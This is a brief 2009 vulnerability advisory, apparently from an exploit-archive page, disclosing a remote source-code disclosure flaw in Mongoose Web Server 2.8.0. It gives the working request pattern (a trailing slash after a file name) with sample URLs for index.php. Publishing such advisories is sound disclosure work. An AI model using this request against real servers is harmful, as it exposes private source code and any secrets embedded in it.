Mongoose Web Server 2.8.0 remote source disclosure

2009-10-23 / 2009-10-24

Credit: Dr_IDE

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By:	Dr_IDE
# Tested On:	Windows XPSP3
# Download: 	http://code.google.com/p/mongoose/
#
#######################################################

- Description -

Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.

Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.

- Technical Details -

http://[ webserver IP][:port]/[ file ][/]

http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/

#[pocoftheday.blogspot.com]

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Mongoose Web Server 2.8.0 remote source disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Mongoose Web Server 2.8.0 remote source disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.